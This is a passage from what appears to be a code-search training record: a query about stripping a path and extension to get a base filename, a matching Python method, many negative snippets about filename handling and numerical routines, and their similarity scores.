dim=0).transpose(0,1).unsqueeze(0) # 1*2*N\n pts_cat_2 = pts_cat_2[:,:2]\n # if pts_ells_2 is not None:\n # pts_ells_cat_2 = torch.cat(pts_ells_2, dim=1).unsqueeze(0) # 1*4*N\n \n ### griding pts_2\n grid_shape = (len(pts_2), 2, grid_h, grid_w)\n pts_grid_2 = grid_from_concat_flat_func(pts_uvb_cat_2_split, pts_cat_2, grid_shape)\n\n mask_cat_2 = torch.ones_like(pts_cat_2[:,[0]]).to(dtype=torch.bool)\n grid_mask_shape = (len(pts_2), 1, grid_h, grid_w)\n mask_grid_2 = grid_from_concat_flat_func(pts_uvb_cat_2_split, mask_cat_2, grid_mask_shape)\n\n ### griding ells_2\n pts_ells_cat_2 = torch.cat(pts_ells_2, dim=1).unsqueeze(0) # 1*4*N\n pts_ells_cat_2 = pts_ells_cat_2[:, :4]\n grid_ells_shape = (len(pts_2), 4, grid_h, grid_w)\n pts_ells_grid_2 = grid_from_concat_flat_func(pts_uvb_cat_2_split, pts_ells_cat_2, grid_ells_shape)\n\n ### convert dtype\n pts_uvb_cat_2 = pts_uvb_cat_2.float()\n\n ### pts_2 is flat, pts_2 is grid (output 1*NN*N, where N is # of pts in flat) \n inp = PtSampleInGridSigmaGrid.apply(pts_uvb_cat_2.contiguous(), pts_cat_2.contiguous(), pts_ells_grid_2.contiguous(), pts_grid_2.contiguous(), mask_grid_2.contiguous(), self.opts.neighbor_range, False, return_pdf)\n # inp = PtSampleInGrid.apply(pts_uvb_cat_2.contiguous(), pts_cat_2.contiguous(), pts_grid_2.contiguous(), mask_grid_2.contiguous(), self.opts.neighbor_range, pts_ell, False, True, 0, return_pdf)\n inp = inp / (2*np.pi)\n\n inp = inp.sum(dim=1)\n\n if per_point:\n return inp\n else: \n ### select the covered points\n inp = inp[inp>0]\n # ### set a minimum for inp\n # inp = torch.clamp(inp, min=1e-7)\n\n ### harmonic mean\n nel = inp.numel()\n inp_sum = 1 / ((1 / inp).mean()) \n inp_sum = inp_sum * nel\n # ### log likelihood\n # inp_sum = torch.log(inp).sum()\n\n return inp_sum", "def IterateValues(self):\n agrid = self.agrid\n self.w = self.setwage(self.K, self.N)\n self.r = self.setrate(self.K, self.N)\n self.b = self.benefit(self.N)\n\n for l in range(self.Na): \n self.c[-1][l] = agrid[l]*(1+self.r) + self.b\n self.v[-1][l] = self.util(self.c[-1][l],0)\n self.vtilde[-1] = interp1d(agrid,self.v[-1], kind='cubic')\n\n for y in range(-2,-(self.T+1),-1): # y = -2, -3,..., -60\n m0 = 0 \n for l in range(self.Na):\n # Find a bracket within which optimal a' lies\n m = max(0, m0-1)\n m0, a, b, c = self.GetBracket(y, l, m, agrid)\n # Define objective function for optimal a'\n def objfn(a1):\n v = self.value(y, agrid[l], a1)\n return -v\n # Find optimal a' using Golden Section Search\n if a == b:\n self.a[y][l] = 0\n elif b == c:\n self.a[y][l] = agrid[-1]\n else:\n result = minimize_scalar(objfn, bracket=(a,b,c), method='Golden')\n #‘Brent’,‘Bounded’,‘Golden’\n self.a[y][l] = result.x\n # Computing consumption and labor\n if y >= -self.R:\n self.c[y][l], self.n[y][l] = (1+self.r)*agrid[l] + self.b - self.a[y][l], 0\n else:\n self.c[y][l], self.n[y][l] = self.solve(agrid[l], self.a[y][l])\n self.v[y][l] = self.util(self.c[y][l],self.n[y][l]) + self.beta*self.vtilde[y+1](self.a[y][l])\n self.vtilde[y] = interp1d(agrid, self.v[y], kind='cubic')", "def __call__(self, X, Y=None, eval_gradient=False):\n list_pfunc = self._get_one_param('list_func')\n if(Y is None):\n Y =X\n for f in reversed(list_pfunc):\n X = f(X, Y=Y, eval_gradient=False)\n return X", "def run(self, functions, x, weights=None):\n for f in functions:\n self.check_compatibility(f, self.INTERFACES)\n\n num = len(functions)\n\n if weights is None:\n weights = [1.0 / float(num)] * num\n\n x_new = x_old = x\n p = [0.0] * len(functions)\n z = [0.0] * len(functions)\n for i in xrange(num):\n z[i] = np.copy(x)\n\n for i in xrange(1, self.max_iter + 1):\n\n for i in xrange(num):\n p[i] = functions[i].proj(z[i])\n\n # TODO: Does the weights really matter when the function is the\n # indicator function?\n x_old = x_new\n x_new = np.zeros(x_old.shape)\n for i in xrange(num):\n x_new += weights[i] * p[i]\n\n for i in xrange(num):\n z[i] = x + z[i] - p[i]\n\n if maths.norm(x_new - x_old) / maths.norm(x_old) < self.eps \\\n and i >= self.min_iter:\n break\n\n return x_new", "def Gravel(N, sigma2, R, f_def, params):\n\n # pull out algorithm-specific parameters\n max_iter = params['max_iter']\n tol = params['tol']\n\n # evolution\n if 'evolution' in params:\n evolution = params['evolution']\n evolution_list = []\n\n # initalize\n iteration = 0\n f = f_def\n N0 = np.sum(R * f, axis=1)\n\n # begin iteration\n while iteration < max_iter and norm(N0 - N, ord=2) > tol:\n\n # print info\n message = 'Iteration {}: Error {}'.format(iteration, norm(N0 - N, ord=2))\n print(message)\n\n # add evolution\n if evolution:\n evolution_list.append(f)\n\n # break down equations into simpler terms\n a = (R * f)\n b = np.sum(R * f, axis=1)\n c = (N**2 / sigma2)\n log_term = np.log(N / b)\n\n # compute the uper and lower portion of the exponential\n top = np.sum((((a.T / b) * c) * log_term).T, axis=0)\n bot = np.sum(((a.T / b) * c).T, axis=0)\n\n # compute the coefficient array\n coef = np.exp(top / bot)\n\n # update the new f\n f = f * coef\n\n # update f\n N0 = np.sum(R * f, axis=1)\n iteration += 1\n\n # print info\n message = 'Final Iteration {}: Error {}'.format(iteration, norm(N0 - N, ord=2))\n print(message)\n\n # add evolution\n if evolution:\n evolution_list.append(f)\n return f, evolution_list\n\n return f" ]
[ "0.62774193", "0.62126994", "0.6181909", "0.6074451", "0.6043692", "0.6043692", "0.6038648", "0.60327077", "0.59558785", "0.58665967", "0.58031106", "0.5786653", "0.57752985", "0.5758363", "0.5745993", "0.57132185", "0.57118523", "0.56945556", "0.56928897", "0.56743944", "0.5671344", "0.5625627", "0.56111604", "0.5606437", "0.55856377", "0.5584949", "0.5568414", "0.5563865", "0.55502737", "0.5526141", "0.551366", "0.5511965", "0.5508803", "0.54978627", "0.54926145", "0.5490521", "0.5483158", "0.54692", "0.5460595", "0.5454594", "0.54400986", "0.54322684", "0.5413122", "0.54093045", "0.5405992", "0.5398796", "0.53961563", "0.5394355", "0.5389591", "0.5385932", "0.538081", "0.537892", "0.53671664", "0.5366368", "0.5352174", "0.53343904", "0.53310186", "0.5307141", "0.53061867", "0.5303971", "0.52955145", "0.5282168", "0.52806234", "0.52789956", "0.52782774", "0.5277873", "0.5277288", "0.52735907", "0.5269207", "0.52621377", "0.52605283", "0.52575004", "0.5250245", "0.5246358", "0.5245642", "0.5242143", "0.52238554", "0.5210534", "0.5210112", "0.52061117", "0.52056766", "0.5205027", "0.52014107", "0.51937526", "0.5187199", "0.51864105", "0.5184707", "0.51837254", "0.51767486", "0.5176287", "0.5172477", "0.51723164", "0.51673615", "0.51666117", "0.51649755", "0.5163784", "0.5163481", "0.5160783", "0.5156951", "0.51563036", "0.51521665" ]
0.0
-1
Strip path and extension. Return base filename.
def basename(self): return get_basename(self.filename)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filename_strip_ext(filename):\n base = os.path.basename(filename)\n # Strip file extension\n return os.path.splitext(base)[0]", "def get_filename(file_path):\n\n # Get rid of directories and etc\n just_file = os.path.basename(file_path)\n\n # Now we return just the base name\n return os.path.splitext(just_file)[0]", "def get_file_name_with_ext(path: str) -> str:\n return os.path.basename(path)", "def strip_path(path):\n name_re = re.compile(\"[^/]*\\.([a-z]+)$\")\n return name_re.search(path).group(0)", "def strip_extension(filename):\n return filename.rsplit('.',1)[-2]", "def get_fileext(file_path):\n\n # Get rid of directories and etc\n just_file = os.path.basename(file_path)\n\n # Now we return just the base name\n return os.path.splitext(just_file)[1]", "def filepath_without_ext(filepath: str) -> str:\n return str(pathlib.Path(filepath).with_suffix(''))", "def getfilename(path):\r\n return path.split('\\\\').pop().split('/').pop().rsplit('.', 1)[0]", "def base_filename(self):\n return self.filename.split('.')[0]", "def basename(file_path: str, extension: bool = False):\n file_name = os.path.basename(file_path)\n if not extension:\n file_name, *_ = file_name.split(\".\")\n return file_name", "def clear_ext(x):\r\n return os.path.splitext(os.path.basename(x))[0]", "def name_sans_ext(self) -> str:\n return os.path.splitext(self.path)[0]", "def clean_file_path(path):\r\n\r\n return path.split(\"/\")[-1]", "def get_filename(path):\n return path.split('/')[-1]", "def basename_sans(path):\n return os.path.splitext(os.path.basename(path))[0]", "def clean_filename(file):\r\n\r\n return file.split('.')[0]", "def strip_path(fpath):\n if not fpath:\n return fpath\n try:\n file_path, file_name = os.path.split(fpath)\n except Exception:\n file_name = fpath\n return file_name", "def basefname(fname):\n return os.path.splitext(fname.split(\"\\\\\")[-1])[0]", "def get_base_name(path):\n return os.path.basename(path).split('.')[0]", "def file_name(path):\n return os.path.basename(path).split('.')[0]", "def get_file_name(path: str) -> str:\n return os.path.splitext(os.path.basename(path))[0]", "def path_extension(self):\r\n return self.path.split('/')[-1].split('.')[-1]", "def filename_from_path(filepath: str) -> str:\n return filepath.split(\"/\")[-1]", "def filePathToFileName(path):\n return os.path.splitext(os.path.basename(path))[0]", "def get_full_path(file_extension=True) -> str:\n return get_directory() + \"/\" + get_filename(file_extension=file_extension)", "def base_name(path):\n return os.path.basename(path)", "def base_name(self):\n return \".\".join(posixpath.basename(self.file_name).split(\".\")[:-1])", "def get_file_name(file_path):\n full_file_name = file_path.split(os.sep)[-1]\n file_name = full_file_name.split(\".\")[0]\n return file_name", "def getInputFileBasenameNoSuffix():\n\n inputFileBasename = getInputFileBasename()\n basenameRemovedSuffix = removeSuffix(inputFileBasename)\n return basenameRemovedSuffix", "def basename(path):\n\n return path.rpartition(\"/\")[2]", "def filename(self):\n filename, ext = os.path.splitext(self.file.name)\n return filename.split('/')[-1]", "def extract_file_name(file_path):\n # ファイルパスからファイル名(拡張子含む)を取り出す\n file_name = file_path.split('/')[-1]\n # 拡張子を取り除く\n return file_name.split('.')[0]", "def path_filename_representation(path):\n # Strip leading / and replace / with .\n return re.sub(r\"^/(.*)$\", r\"\\1\", path).replace(\"/\", \".\")", "def file_title(self):\n basename = os.path.basename(self.__path)\n index_dot = basename.rfind(\".\")\n if index_dot == 0:\n return basename[1:]\n return basename if index_dot < 0 else basename[:index_dot]", "def just_the_name(path):\n return os.path.splitext(os.path.basename(path))[0]", "def remove_extension(path):\n for extension in EXTENSIONS:\n path = path.replace(\".%s\" % extension, \"\")\n return path", "def basename(path):\r\n return split(path)[1]", "def split_path(path):\n #drop file extension\n filename = path.rsplit('.', 1)[0]\n #drop static/img/\n filename = filename[11:]\n return filename", "def basename(path):\r\n return path.replace(\"\\\\\", \"/\").split(\"/\")[-1]", "def basename(path: str) -> str:\n pass", "def _getFileExtension( filepath ):\r\n file = os.path.splitext(filepath.lower())\r\n if len( file ):\r\n return file[1].replace( '.', '' )\r\n else:\r\n return filepath", "def filepath_name_only(filepath: str) -> str:\n return pathlib.Path(filepath).stem", "def get_file_name(path):\n return os.path.basename(path)", "def strip_path(self):\n return self.path.replace('/', '')", "def get_filename(self):\n name, ext = self.fkit.filename.rsplit('.', 1)\n if self._field.extension():\n ext = self._field.extension()\n return '.'.join((name, ext))", "def isolate_path_filename(self, uri, api_base=None):\n # Did we get an api_base\n api_base = api_base if api_base else self.api_base\n\n # Look for the part after the api_base\n url_parse = uri.lower().rpartition(api_base)\n\n # Take everything to the right of the api_base\n file_component = url_parse[2]\n\n # Remove any URL ? parameters\n if '?' in file_component:\n file_component = file_component.rpartition('?')[0]\n\n #: Remove URL encoding\n file_component = unquote(file_component)\n\n #: Remove any spaces in the filename\n file_component = file_component.replace(' ','')\n\n return file_component", "def basename(file_path):\n return os.path.basename(file_path)", "def getFilename(path):\n\tfrom os.path import split\n\tpath = normalizePath(path)\n\treturn split(path)[1]", "def _get_ext(self, path):\n return os.path.splitext(path)[1][1:]", "def get_file_extension(fpath):\n return str(fpath).split(\".\")[-1]", "def get_filename(file_extension=False) -> str:\n if file_extension == False:\n return filename[0:filename.find(\".json\")]\n else:\n return filename", "def purebasename(self):\n return self._getbyspec(\"purebasename\")[0]", "def purebasename(self):\n return self.namebase", "def get_extension(filename: str) -> str:\n return Path(filename).suffix[1:]", "def get_name_from_path(self, file_path, replace=False):\n\n if replace:\n base_name = os.path.basename(file_path)\n ext = os.path.splitext(base_name)[1]\n _out = base_name.replace(ext, '')\n return _out\n\n head, tail = os.path.split(file_path)\n return tail or os.path.basename(head)", "def _get_extension_from_string(path):\n file_name_parts = os.path.basename(path).split('.')\n if len(file_name_parts) == 1: # no periods in file name\n return ''\n if len(file_name_parts) > 2: # two or more periods in file name\n return '.'.join(file_name_parts[-2:])\n return file_name_parts[-1] # one period in file name", "def filter_pathbase(val: Optional[str]) -> str:\n return os.path.basename(val or '')", "def GetBase(self, fname, suffix):\n wds = fname.split('/')\n suff = suffix.replace('.BRIK','')\n suff = suff.replace('.HEAD','')\n if len(wds) > 1:\n return '.../%s' % '/'.join(wds[-2:]) + suff\n else:\n return fname + suff", "def getFileName(filepath):\n return os.path.splitext(os.path.basename(filepath))[0]", "def get_file_extension(file_path):\n _ext = os.path.splitext(file_path)[-1]\n if _ext:\n return _ext[1:] if _ext.startswith('.') else _ext\n else:\n return \"\"", "def get_filename(filepath):\n return os.path.basename(filepath)", "def file_ext(path):\n result = os.path.splitext(path)[1]\n return result", "def basename(self, filename):\n return filename.replace(self.remote_path, '', 1).lstrip(sep)", "def get_file_basename(self):\n return self._basename[:]", "def get_filename(self) -> str:\n fname = self.url.split(\"/\")[-1]\n if \",\" in fname:\n _fname, _i = fname.split(\",\")\n _split_fname = _fname.split(\".\")\n _name = _split_fname[0]\n _extension = _split_fname[-1]\n return _name + _i + \".\" + _extension\n else:\n return fname", "def get_filename(img_path):\n filename = os.path.splitext(img_path)\n return os.path.basename(filename[0])", "def get_file_ext(path: str) -> str:\n return os.path.splitext(os.path.basename(path))[1]", "def get_file_name(file):\n return os.path.splitext(os.path.basename(file))[0]", "def filepath_ext(filepath: str) -> str:\n return pathlib.Path(filepath).suffix", "def get_scriptname(fname):\n base = os.path.basename(fname)\n res = os.path.splitext(base)[0]\n return res", "def get_basename(file: Union[str, FileStorage]) -> str:\n filename = _retrieve_filename(file)\n # split will split at the final part of the path(image.jpg) and everything\n # before it is at index 0\n return os.path.split(filename)[1]", "def name(self) -> str:\n if '/' in self.path.strip('/'):\n basename: str = os.path.basename(self.path)\n return basename\n return self.path", "def fextension(filename):\n filename = os.path.normpath(filename)\n return os.path.splitext(filename)[1]", "def extension_from_path(path):\n extension = path.split(\".\")[-1]\n return extension", "def get_filepath(image):\r\n extension = (len(image.split('/')[-1:][0]))\r\n return image[:-extension]", "def get_basename(absolute_file_path):\r\n return absolute_file_path.split('/')[-1]", "def base(self):\n return os.path.basename(self.path)", "def replace_ext(path, ext):\n if not ext.startswith(\".\"):\n ext = \".\" + ext\n root = os.path.splitext(path)[0]\n return root + ext", "def pathToFileName(self, path):\n\t\t# Find the path, and strip the leading slash.\n\t\tpath =urlparse.urlparse(self.path)[2].lstrip(\"/\")\n\t\t# Process url escape codes, and normalize the path.\n\t\tpath = os.path.normpath(urllib2.unquote(path))\n\t\t# normpath strips the last slash\n\t\tif os.path.isdir(path):\n\t\t\treturn path + '/'\n\t\telse:\n\t\t\treturn path", "def just_the_name(path):\n name = os.path.splitext(os.path.basename(path))[0]\n return name", "def noTrailingSlash(path):\n return path.split('/')[0]", "def filename_ext(filename):\n base = os.path.basename(filename)\n return os.path.splitext(base)[1][1:]", "def filter_pathname(val: Optional[str]) -> str:\n return os.path.splitext(os.path.basename(val or ''))[0]", "def getBaseName(filepath):\n return os.path.basename(filepath)", "def ext(self):\n import os, string\n (base,ext) = os.path.splitext(self.filename())\n if ext == '':\n return None\n else:\n return string.lstrip(ext, '\\.')", "def fixExt(ext):\n if not ext.startswith(\".\"):\n return \".{}\".format(ext)\n return ext", "def get_file_ext(self):\n return self.archive.url.split('.')[-1].lower()", "def filter_filename(self, fname):\r\n return os.path.basename(fname)", "def filepath_name_ext(filepath: str) -> str:\n return pathlib.Path(filepath).name", "def getFilenameExtension(path):\n return os.path.splitext(os.path.normcase(path))[1]", "def normalize_filename(url):\n fname = url.replace('file://', '')\n if os.sep != '/' and not os.path.exists(fname):\n fname = fname.lstrip('/')\n return fname", "def getDirectoryFilename(path):\n\tfrom os.path import splitext\n\tpath = normalizePath(path)\n\treturn splitext(path)[0]", "def get_file_ext(filename):\n p = pathlib.Path(filename)\n if len(p.suffixes) <= 1:\n return p.suffix\n elif p.suffixes[-2] in include_subexts:\n return ''.join(p.suffixes[-2:])\n else:\n return p.suffix", "def get_file_name(self):\n return self.path.name[6:]", "def path_show_ext(fullpath):\n tmp = os.path.splitext(fullpath)\n ext = tmp[1]\n p = tmp[0]\n while tmp[1] != '':\n tmp = os.path.splitext(p)\n ext = tmp[1] + ext\n p = tmp[0]\n\n path = os.path.dirname(p)\n if path == '':\n path = '.'\n base = os.path.basename(p)\n return path, base, ext", "def get_filename(filepath):\n return filepath.replace(\"{}\\\\\".format(RES_DIR), \"\")", "def fix_filename(self):\n if not self.remove_path:\n return\n self.filename = re.sub(\".+\\/\", \".../\", self.filename)", "def basename(self):\n return os.path.basename(self.filepath)", "def extract_dir_name(input_file):\r\n fname = PurePath(input_file).__str__()\r\n s = fname.split('.')\r\n name = '.'.join(s[:-1])\r\n return name", "def basename(self):\n return self._getbyspec(\"basename\")[0]" ]
[ "0.80113024", "0.7722132", "0.7642737", "0.7580186", "0.7531498", "0.74958444", "0.7461117", "0.72882116", "0.726376", "0.72585756", "0.7248201", "0.72440237", "0.7239742", "0.7233385", "0.7215656", "0.721015", "0.72061", "0.7173597", "0.7156511", "0.7147149", "0.7107287", "0.7099546", "0.70622176", "0.70616364", "0.6982735", "0.695597", "0.6949522", "0.6921622", "0.6913202", "0.6901259", "0.6895388", "0.6888045", "0.68749934", "0.68663746", "0.6865515", "0.68462056", "0.6839596", "0.6801944", "0.68016255", "0.67852485", "0.67792135", "0.6775378", "0.6774416", "0.6763617", "0.67192763", "0.66972464", "0.66917276", "0.6687669", "0.6686982", "0.66694206", "0.6665019", "0.6660274", "0.66554016", "0.6648614", "0.66439754", "0.6618102", "0.66139215", "0.66074085", "0.66031", "0.6598766", "0.659014", "0.65814316", "0.6575644", "0.6574195", "0.65731525", "0.6572223", "0.65682024", "0.65615886", "0.65428174", "0.653724", "0.6529534", "0.6520246", "0.6511237", "0.6510246", "0.6506867", "0.64933485", "0.64922786", "0.6488464", "0.647562", "0.6475524", "0.6469917", "0.6467192", "0.64612824", "0.6459893", "0.64508355", "0.6443977", "0.64415103", "0.6429956", "0.64272386", "0.64201933", "0.6418401", "0.6415635", "0.64115417", "0.6407491", "0.6394156", "0.6389523", "0.63879526", "0.63877285", "0.63765436", "0.6356971" ]
0.6472341
80
Construct and return a filename for this tile.
def generate_filename( self, directory=os.getcwd(), prefix="tile", format="png", path=True ): filename = prefix + "_{col:02d}_{row:02d}.{ext}".format( col=self.column, row=self.row, ext=format.lower().replace("jpeg", "jpg") ) if not path: return filename return os.path.join(directory, filename)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tilefilename(self, x, y, z):\n\n tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]\n return os.path.join(\"TileGroup%.0f\" % math.floor( tileIndex / 256 ),\n \"%s-%s-%s.%s\" % ( z, x, y, self.tileformat))", "def tilefilename(self, x, y, z):\n\n tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]\n return os.path.join(\"TileGroup%.0f\" % math.floor(tileIndex / 256),\n \"%s-%s-%s.%s\" % (z, x, y, self.tileformat))", "def create_file_name(self):\n # create a unique id for the file name\n index = self.helpers.alpha_uuid()\n\n filename = self.form['FieldStorage'][self.image_cid].filename\n extension = guess_extension(guess_type(filename)[0])\n return ( # concatenates the following data\n self.articleData.get('directory') + # directory\n '/' + # slash\n self.articleData.get('article_name') + # the article name\n '-' + # hyphen character\n index + # the id of the image\n extension\n )", "def filename(self):\n return '%s%s' % (self.identifier, self.extension)", "def get_filename(cls):\n return osp.join(cls.dir_location, *cls.file_path)", "def filename(self):\n return self.config.get('filename', self.id) + f'_{self.file_suffix}'", "def filename(self):\n translator = {ord(\" \"): \"_\", ord(\",\"): None}\n return f'{self._full_name.translate(translator)}.txt'", "def create_filename (self):\n\t\tassert self.__patient_name and self.__location_name, \"New filename could not be determined, one or more needed arguments is empty!\"\n\t\t_patient_name = self.__patient_name.split(' ')\n\t\t_patient_name.reverse()\n\t\t\n\t\treturn os.path.join(os.path.dirname(self.file._path), \"%s MR %s%s\" % (self.__location_name, ', '.join(_patient_name).upper(), self._file.extension))", "def filename(self):\n return TaskInfo._filename(self.id)", "def generate_file_name(entry):\n return str_for_file(u'{name}, {year}, {title}'.format(\n year=entry['year'],\n name=get_last_name(entry['author'][0]),\n title=entry['title']\n ))", "def get_file_name(self):\n return str(self.get_file())", "def get_filename(self) -> str:\n return self._filename", "def generateFileName(self):\n return 'Covid' + self.map_type + '.html'", "def generate_file_filename(instance, filename):\n return _generate_filename(instance, filename, 'photos')", "def _prettyfilename(self):\n return f'{self.title} ({self.subtype})'", "def file_name(id, title, kind=\"src\"):\n fn_template = conf.template_source_file_name\n if kind == \"tst\":\n fn_template = conf.template_test_file_name\n\n return fn_template.format(id=id, title=title.replace(\"-\", \"_\"))", "def construct_basename(self, row, obstime=None):\n _obstime = self.construct_obstime(row) if obstime is None else obstime\n tiso = time.Time(_obstime, format='isot')\n dtime = datetime.datetime.strptime(tiso.value, '%Y-%m-%dT%H:%M:%S.%f')\n return '{0}-{1}_{2}_{3}{4}'.format(self['filename'][row].split('.fits')[0],\n self['target'][row].replace(\" \", \"\"),\n self.spectrograph.camera,\n datetime.datetime.strftime(dtime, '%Y%m%dT'),\n tiso.value.split(\"T\")[1].replace(':',''))", "def makefilename(self):\n fp= (pathlib.Path(self.vr_folder).expanduser()/(time.strftime(self.vr_filename))).with_suffix('')\n fp.parent.mkdir(parents=True, exist_ok=True)\n print('files setup', str(fp))\n return fp", "def filename(self):\n _, tail = os.path.split(self.url)\n return self.folder + '/' + tail[:-4] + '/' + tail[:-3] + 'shp'", "def get_image_filename(self, filename):\n path = 'images/{folder}/{filename}'.format(\n folder=self.folder,\n filename=filename\n )\n return path", "def _filename(self, key):\n return os.path.join(self.root, key[:2], key)", "def out_filename(self, filetype, dir, format='old'):\n filename = self.filename(filetype=filetype, format=format)\n return Path(dir) / filename", "def temp_name(self, filename):\n if self.params.get('nopart', False) or filename == '-' or \\\n (os.path.exists(encodeFilename(filename)) and not os.path.isfile(encodeFilename(filename))):\n return filename\n return filename + '.part'", "def _get_filepath(self, name=None, use_timestamp=True):\n current_time = str(int(time.time()))\n if not name and not use_timestamp:\n raise Exception(\"Name or timestamp is required\")\n if name:\n self.fname = \"%s\" % name\n current_time = \"_%s\" % current_time\n if use_timestamp:\n self.fname = \"%s%s\" % (self.fname, current_time)\n if len(self.fname) > 0:\n self.fname = \"%s/%s.jpg\" % (self.picture_directory, self.fname)\n return self.fname", "def filename(self):\n if self.__filename__ is None:\n return _filename\n else:\n return self.__filename__", "def filename(self):\n # TODO(aron): write tests for this\n\n return os.path.basename(self.file_on_disk.name)", "def get_file_name(self):\n\n return \"%s - %s\" % (self.get_tags()[\"artist\"], self.get_tags()[\"title\"])", "def _getfilename(self):\n pass", "def get_filename(self):\n return self.__filename", "def name(self):\n return self._filename", "def filename_generate(image_class, size=12, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):\n\tnew_filename = time.strftime(\"%d-%m-%Y_\")\n\tnew_filename = new_filename + ''.join(random.choice(chars) for _ in range(size))\n\tnew_filename = new_filename + \"_P\" + str(image_class)\n\treturn new_filename", "def get_dest_name ( self ):\n return self.filename", "def _get_filename(self, type_: str, name: str) -> str:\n if not os.path.isdir(self._datadir):\n os.mkdir(self._datadir, mode=0o700)\n\n type_dir = os.path.join(self._datadir, type_)\n if not os.path.isdir(type_dir):\n os.mkdir(type_dir, mode=0o700)\n\n fn = os.path.join(type_dir, name) + '.yaml'\n return fn", "def filename(self):\n # type: () -> str\n return self._filename", "def get_filename(self):\n return self.filename", "def _prettyfilename(self):\n return f'{self.grandparentTitle} - {self.seasonEpisode} - {self.title}'", "def generate_image_filename():\n now = datetime.now().strftime('%a-%w-%b-%H:%M:%S')\n return 'CCTV_{0}.jpg'.format(now)", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n # return Path(dir) / filename\n return filename", "def filename(self):\n # Just the name of the file\n filename = self.use_name\n if self.extension:\n filename = \"{0}.{1}\".format(self.use_name, self.extension)\n # Architecture sub-folder\n arch_folder_conf = spack.config.get(\"modules:%s:arch_folder\" % self.conf.name, True)\n if arch_folder_conf:\n # include an arch specific folder between root and filename\n arch_folder = str(self.spec.architecture)\n filename = os.path.join(arch_folder, filename)\n # Return the absolute path\n return os.path.join(self.dirname(), filename)", "def generate_file_name(self):\n self._session_iterator = None # New file invalidate old interator\n self._img_count += 1\n self._current_file = '{0}/frame_{1}.jpg'.format(self._relative_path,self._img_count)\n return self.current_file", "def _filename(task_id):\n return \"{}.json\".format(task_id)", "def get_filename(self):\n name, ext = self.fkit.filename.rsplit('.', 1)\n if self._field.extension():\n ext = self._field.extension()\n return '.'.join((name, ext))", "def gen_filename(self):\n expansion_string = '_'.join(sorted(args.exp)) if args.exp else 'noexp'\n return 'quad--{}--{}{}{}_{}{}_{}{}_{}{}{}{}{}_{}{}--{:02}_{:02}--{:02}_{:02}_{:02}_{:02}_{:02}_{:02}_{:02}_{:02}_{:02}--{}.log'.format(self.pts_total, hex(self.cnt_T)[-1:], self.cnt_S, self.cnt_U, self.cnt_P, self.cnt_G, self.cnt_F, self.cnt_A, self.cnt_1, self.cnt_2, self.cnt_3, self.cnt_4, self.cnt_5, hex(self.cnt_O)[-1:], self.cnt_M, self.popula, self.energy, self.pts_tower, self.pts_shop, self.pts_public, self.pts_park, self.pts_factory, self.pts_harbor, self.pts_office, self.pts_monument, self.pts_expansion, expansion_string)", "def _prettyfilename(self):\n return f'{self.title} ({self.year})'", "def _generate_filename(instance, filename, prefix):\n md5 = hashlib.md5()\n md5.update(struct.pack('f', time.time()))\n for chunk in instance.file.chunks():\n md5.update(chunk)\n extension = os.path.splitext(filename)[1]\n return os.path.join(prefix, md5.hexdigest() + extension)", "def _prettyfilename(self):\n return self.title", "def ftile(self):\n try:\n ftile = \"_\".join([self[\"grid_name\"], self[\"tile_name\"]])\n except TypeError:\n ftile = None\n return ftile", "def generate_grid_filename(grid, field, level, ext=\"png\"):\n name_s = generate_grid_name(grid).replace(\" \", \"_\")\n field_s = field.replace(\" \", \"_\")\n time_s = generate_grid_time_begin(grid).strftime(\"%Y%m%d%H%M%S\")\n level_s = str(level).zfill(2)\n return f\"{name_s}_{field_s}_{level_s}_{time_s}.{ext}\"", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n #return Path(dir) / filename\n return filename", "def getOutputFilename(self, filename):\n return filename[:-4] + \".txt\"", "def filename(self) -> str:\n return self.__location.filename", "def output_file_name_maker(args):\n log.debug(\"Entering output_file_name_maker()\")\n path = os.getcwd() + '/out_files/'\n if not os.path.isdir(path):\n os.mkdir(path)\n\n if args.output is None:\n out_file_name = path + args.input[:-4] + '_' + args.type + '_' + args.layer\n else:\n out_file_name = path + args.output\n\n log.debug(\"Exiting output_file_name_maker()\")\n return out_file_name", "def _gen_image_filename(instance, filename):\n # First, store the original filename in the model\n instance.original_filename = filename\n\n return _unique_path(instance.owner.pk, filename)", "def create_html_filename(coord_filename, name_ending):\r\n outpath = coord_filename.split('/')[-1] + name_ending\r\n return outpath", "def generate_filename(player_name):\n name = player_name.split()\n filename = '_'.join(name).lower()\n return filename", "def file_name(product, ext='json'):\n return f\"./output/{product}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}_transformed_{version}.{ext}\"", "def get_filename(self):\n return self._filename", "def _get_file_name(name: types.TSeedName) -> str:\n return f\"{name}.yml\"", "def file_on_disk_name(instance, filename):\n return generate_file_on_disk_name(instance.checksum, filename)", "def filename(self):\n return self.__filename", "def _get_station_filename():\n output_dir = os.path.join(output, state, station)\n if not os.path.isdir(output_dir):\n logger.debug(\"Creating directory %s\", output_dir)\n os.makedirs(output_dir)\n return os.path.join(output_dir, \"%s.%s\" % (c_time, format))", "def get_name(self):\n return self.file_name", "def generate_file_name(well, channel, desc):\n \n return \"bPLATE_w\" + well + \"_\" + desc + \"_c\" + channel + \".png\"", "def get_chunk_filename(self, number):\n return '%s-%s.tmp' % (self.identifier, number)", "def base_filename_for_feed_item(feed_item):\n return \"{}_{}\".format(\n int(to_epoch(feed_item.upload_time)),\n feed_item.video_id\n )", "def createname(cls):\n name = config.get(\"pyzombie_filesystem\", \"execbase\")\n name = \"{0}_{1}\".format(name, datetime.utcnow().strftime(\"%Y%jT%H%M%SZ\"))\n if os.path.isdir(Executable.execdirpath(name)):\n #Need to handle the rare case of duplicate resource names---this\n #will happen all the time in testing, but rarely in production.\n index = 0\n altname = \"{0}_{1:03}\".format(name, index)\n while os.path.isdir(Executable.execdirpath(altname)):\n index = index + 1\n altname = \"{0}_{1:03}\".format(name, index)\n name = altname\n return name", "def get_file_name(instance, filename):\n filename = make_unique_filename(filename)\n return os.path.join('uploads/profile_pics', filename)", "def acquire_image_filename(self):\n\t\titem_key = 